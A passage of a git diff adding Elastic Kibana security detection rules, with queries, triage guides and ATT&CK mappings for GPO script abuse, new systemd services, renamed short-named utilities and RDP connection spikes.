Script added to Group Policy Object\n\nGroup Policy Objects (GPOs) can be used by attackers to instruct arbitrarily large groups of clients to execute specified commands at startup, logon, shutdown, and logoff. This is done by creating or modifying the `scripts.ini` or `psscripts.ini` files. The scripts are stored in the following paths:\n - `\\Machine\\Scripts\\`\n - `\\User\\Scripts\\`\n\n#### Possible investigation steps\n\n- This attack abuses a legitimate mechanism of Active Directory, so it is important to determine whether the activity is legitimate and the administrator is authorized to perform this operation.\n- Retrieve the contents of the `ScheduledTasks.xml` file, and check the `` and `` XML tags for any potentially malicious commands or binaries.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Scope which objects may be compromised by retrieving information about which objects are controlled by the GPO.\n\n### False positive analysis\n\n- Verify if the execution is legitimately authorized and executed under a change management process.\n\n### Related rules\n\n- Group Policy Abuse for Privilege Addition - b9554892-5e0e-424b-83a0-5aef95aa43bf\n- Scheduled Task Execution at Scale via GPO - 15a8ba77-1c13-4274-88fe-6bd14133861e\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- The investigation and containment must be performed in every computer controlled by the GPO, where necessary.\n- Remove the script from the GPO.\n- Check if other GPOs have suspicious scripts attached.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "(\n event.code:5136 and winlog.event_data.AttributeLDAPDisplayName:(gPCMachineExtensionNames or gPCUserExtensionNames) and\n winlog.event_data.AttributeValue:(*42B5FAAE-6536-11D2-AE5A-0000F87571E3* and\n (*40B66650-4972-11D1-A7CA-0000F87571E3* or *40B6664F-4972-11D1-A7CA-0000F87571E3*))\n)\nor\n(\n event.code:5145 and winlog.event_data.ShareName:\\\\\\\\*\\\\SYSVOL and\n winlog.event_data.RelativeTargetName:(*\\\\scripts.ini or *\\\\psscripts.ini) and\n (message:WriteData or winlog.event_data.AccessList:*%%4417*)\n)\n", + "references": [ + "https://github.com/atc-project/atc-data/blob/master/docs/Logging_Policies/LP_0025_windows_audit_directory_service_changes.md", + "https://github.com/atc-project/atc-data/blob/f2bbb51ecf68e2c9f488e3c70dcdd3df51d2a46b/docs/Logging_Policies/LP_0029_windows_audit_detailed_file_share.md", + "https://labs.f-secure.com/tools/sharpgpoabuse" + ], + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": true, + "name": "message", + "type": "match_only_text" + }, + { + "ecs": false, + "name": "winlog.event_data.AccessList", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.AttributeLDAPDisplayName", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.AttributeValue", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.RelativeTargetName", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.ShareName", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "16fac1a1-21ee-4ca6-b720-458e3855d046", + "setup": "## Setup\n\nThe 'Audit Detailed File Share' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nObject Access >\nAudit Detailed File Share (Success,Failure)\n```\n\nThe 'Audit Directory Service Changes' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Active Directory", + "Resources: Investigation Guide", + "Use Case: Active Directory Monitoring" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1484", + "name": "Domain Policy Modification", + "reference": "https://attack.mitre.org/techniques/T1484/", + "subtechnique": [ + { + "id": "T1484.001", + "name": "Group Policy Modification", + "reference": "https://attack.mitre.org/techniques/T1484/001/" + } + ] + }, + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 109 + }, + "id": "16fac1a1-21ee-4ca6-b720-458e3855d046_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/17b0a495-4d9f-414c-8ad0-92f018b8e001_9.json b/packages/security_detection_engine/kibana/security_rule/17b0a495-4d9f-414c-8ad0-92f018b8e001_9.json new file mode 100644 index 00000000000..e6902690411 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/17b0a495-4d9f-414c-8ad0-92f018b8e001_9.json @@ -0,0 +1,130 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Systemd service files are configuration files in Linux systems used to define and manage system services. Malicious actors can leverage systemd service files to achieve persistence by creating or modifying service files to execute malicious commands or payloads during system startup. This allows them to maintain unauthorized access, execute additional malicious activities, or evade detection.", + "from": "now-9m", + "history_window_start": "now-10d", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "New Systemd Service Created by Previously Unknown Process", + "new_terms_fields": [ + "host.id", + "file.path", + "process.executable" + ], + "note": "## Triage and analysis\n\n### Investigating New Systemd Service Created by Previously Unknown Process\n\nSystemd service files are configuration files in Linux systems used to define and manage system services.\n\nMalicious actors can leverage systemd service files to achieve persistence by creating or modifying service files to execute malicious commands or payloads during system startup. This allows them to maintain unauthorized access, execute additional malicious activities, or evade detection.\n\nThis rule monitors the creation of new systemd service files, potentially indicating the creation of a persistence mechanism.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the systemd service file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate the currently enabled systemd services through the following command `sudo systemctl list-unit-files`.\n- Investigate whether any other files in any of the available systemd directories have been altered through OSQuery.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (\\npath LIKE '/etc/systemd/system/%' OR \\npath LIKE '/usr/local/lib/systemd/system/%' OR \\npath LIKE '/lib/systemd/system/%' OR\\npath LIKE '/usr/lib/systemd/system/%' OR\\npath LIKE '/home/user/.config/systemd/user/%'\\n)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (\\npath LIKE '/etc/systemd/system/%' OR \\npath LIKE '/usr/local/lib/systemd/system/%' OR \\npath LIKE '/lib/systemd/system/%' OR\\npath LIKE '/usr/lib/systemd/system/%' OR\\npath LIKE '/home/{{user.name}}/.config/systemd/user/%'\\n)\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n- Investigate abnormal behaviors by the subject process/user such as network connections, file modifications, and any other spawned child processes.\n - Investigate listening ports and open sockets to look for potential command and control traffic or data exfiltration.\n - !{osquery{\"label\":\"Osquery - Retrieve Listening Ports\",\"query\":\"SELECT pid, address, port, socket, protocol, path FROM listening_ports\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Open Sockets\",\"query\":\"SELECT pid, family, remote_address, remote_port, socket, state FROM process_open_sockets\"}}\n - Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator who uses systemd services for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Potential Persistence Through Run Control Detected - 0f4d35e4-925e-4959-ab24-911be207ee6f\n- Potential Persistence Through init.d Detected - 474fd20e-14cc-49c5-8160-d9ab4ba16c8b\n- New Systemd Timer Created - 7fb500fa-8e24-4bd1-9480-2a819352602c\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service/timer or restore its original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "host.os.type:linux and event.category:file and event.action:(\"creation\" or \"file_create_event\") and file.path:(\n /etc/systemd/system/* or \n /usr/local/lib/systemd/system/* or \n /lib/systemd/system/* or \n /usr/lib/systemd/system/* or \n /home/*/.config/systemd/user/*\n) and \nnot (\n process.name:(\n \"dpkg\" or \"dockerd\" or \"rpm\" or \"snapd\" or \"yum\" or \"exe\" or \"dnf\" or \"dnf-automatic\" or python* or \"puppetd\" or\n \"elastic-agent\" or \"cinc-client\" or \"chef-client\" or \"pacman\" or \"puppet\" or \"cloudflared\" or \"packagekitd\" or\n \"podman\"\n ) or \n file.extension:(\"swp\" or \"swpx\")\n)\n", + "references": [ + "https://opensource.com/article/20/7/systemd-timers", + "https://pberba.github.io/security/2022/01/30/linux-threat-hunting-for-persistence-systemd-timers-cron/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "17b0a495-4d9f-414c-8ad0-92f018b8e001", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Privilege Escalation", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/", + "subtechnique": [ + { + "id": "T1543.002", + "name": "Systemd Service", + "reference": "https://attack.mitre.org/techniques/T1543/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/", + "subtechnique": [ + { + "id": "T1543.002", + "name": "Systemd Service", + "reference": "https://attack.mitre.org/techniques/T1543/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 9 + }, + "id": "17b0a495-4d9f-414c-8ad0-92f018b8e001_9", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/17c7f6a5-5bc9-4e1f-92bf-13632d24384d_108.json b/packages/security_detection_engine/kibana/security_rule/17c7f6a5-5bc9-4e1f-92bf-13632d24384d_108.json new file mode 100644 index 00000000000..f4f7b013aa4 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/17c7f6a5-5bc9-4e1f-92bf-13632d24384d_108.json @@ -0,0 +1,94 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the execution of a process with a single character process name, differing from the original file name. This is often done by adversaries while staging, executing temporary utilities, or trying to bypass security detections based on the process name.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Renamed Utility Executed with Short Program Name", + "note": "## Triage and analysis\n\n### Investigating Renamed Utility Executed with Short Program Name\n\nIdentifies the execution of a process with a single character process name, differing from the original file name. This is often done by adversaries while staging, executing temporary utilities, or trying to bypass security detections based on the process name.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, command line and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and length(process.name) > 0 and\n length(process.name) == 5 and length(process.pe.original_file_name) > 5\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "17c7f6a5-5bc9-4e1f-92bf-13632d24384d", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.003", + "name": "Rename System Utilities", + "reference": "https://attack.mitre.org/techniques/T1036/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "17c7f6a5-5bc9-4e1f-92bf-13632d24384d_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/17c7f6a5-5bc9-4e1f-92bf-13632d24384d_109.json b/packages/security_detection_engine/kibana/security_rule/17c7f6a5-5bc9-4e1f-92bf-13632d24384d_109.json new file mode 100644 index 00000000000..5d98f6396b0 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/17c7f6a5-5bc9-4e1f-92bf-13632d24384d_109.json @@ -0,0 +1,94 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the execution of a process with a single character process name, differing from the original file name. This is often done by adversaries while staging, executing temporary utilities, or trying to bypass security detections based on the process name.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Renamed Utility Executed with Short Program Name", + "note": "## Triage and analysis\n\n### Investigating Renamed Utility Executed with Short Program Name\n\nIdentifies the execution of a process with a single character process name, differing from the original file name. This is often done by adversaries while staging, executing temporary utilities, or trying to bypass security detections based on the process name.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, command line and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and length(process.name) > 0 and\n length(process.name) == 5 and length(process.pe.original_file_name) > 5\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "17c7f6a5-5bc9-4e1f-92bf-13632d24384d", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.003", + "name": "Rename System Utilities", + "reference": "https://attack.mitre.org/techniques/T1036/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "17c7f6a5-5bc9-4e1f-92bf-13632d24384d_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/18a5dd9a-e3fa-4996-99b1-ae533b8f27fc_3.json b/packages/security_detection_engine/kibana/security_rule/18a5dd9a-e3fa-4996-99b1-ae533b8f27fc_3.json new file mode 100644 index 00000000000..204ef6591f0 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/18a5dd9a-e3fa-4996-99b1-ae533b8f27fc_3.json @@ -0,0 +1,61 @@ +{ + "attributes": { + "anomaly_threshold": 70, + "author": [ + "Elastic" + ], + "description": "A machine learning job has detected a high count of source IPs establishing an RDP connection with a single destination IP. Attackers might use multiple compromised systems to attack a target to ensure redundancy in case a source IP gets detected and blocked.", + "from": "now-12h", + "interval": "15m", + "license": "Elastic License v2", + "machine_learning_job_id": "lmd_high_rdp_distinct_count_source_ip_for_destination", + "name": "Spike in Number of Connections Made to a Destination IP", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html", + "https://docs.elastic.co/en/integrations/lmd", + "https://www.elastic.co/blog/detecting-lateral-movement-activity-a-new-kibana-integration", + "https://www.elastic.co/blog/remote-desktop-protocol-connections-elastic-security" + ], + "related_integrations": [ + { + "package": "lmd", + "version": "^2.0.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "risk_score": 21, + "rule_id": "18a5dd9a-e3fa-4996-99b1-ae533b8f27fc", + "setup": "## Setup\n\nThe rule requires the Lateral Movement Detection integration assets to be installed, as well as file and Windows RDP process events collected by the Elastic Defend integration. \n\n### Lateral Movement Detection Setup\nThe Lateral Movement Detection integration detects lateral movement activity by identifying abnormalities in file and Windows RDP events. Anomalies are detected using Elastic's Anomaly Detection feature.\n\n#### Prerequisite Requirements:\n- Fleet is required for Lateral Movement Detection.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n- Windows RDP process events collected by the [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint) integration.\n- To install Elastic Defend, refer to the [documentation](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n#### The following steps should be executed to install assets associated with the Lateral Movement Detection integration:\n- Go to the Kibana homepage. Under Management, click Integrations.\n- In the query bar, search for Lateral Movement Detection and select the integration to see more details about it.\n- Under Settings, click Install Lateral Movement Detection assets and follow the prompts to install the assets.\n\n#### Anomaly Detection Setup\nBefore you can enable rules for Lateral Movement Detection, you'll need to enable the corresponding Anomaly Detection jobs.\n- Before enabling the Anomaly Detection jobs, confirm that the Pivot Transform asset is installed and actively gathering data in the destination index `ml-rdp-lmd`.\n- Go to the Kibana homepage. Under Analytics, click Machine Learning.\n- Under Anomaly Detection, click Jobs, and then click \"Create job\". Select the Data View containing your transformed RDP process data i.e.`ml-rdp-lmd`.\n- If the selected Data View contains events that match the query in [this](https://github.com/elastic/integrations/blob/main/packages/lmd/kibana/ml_module/lmd-ml.json) configuration 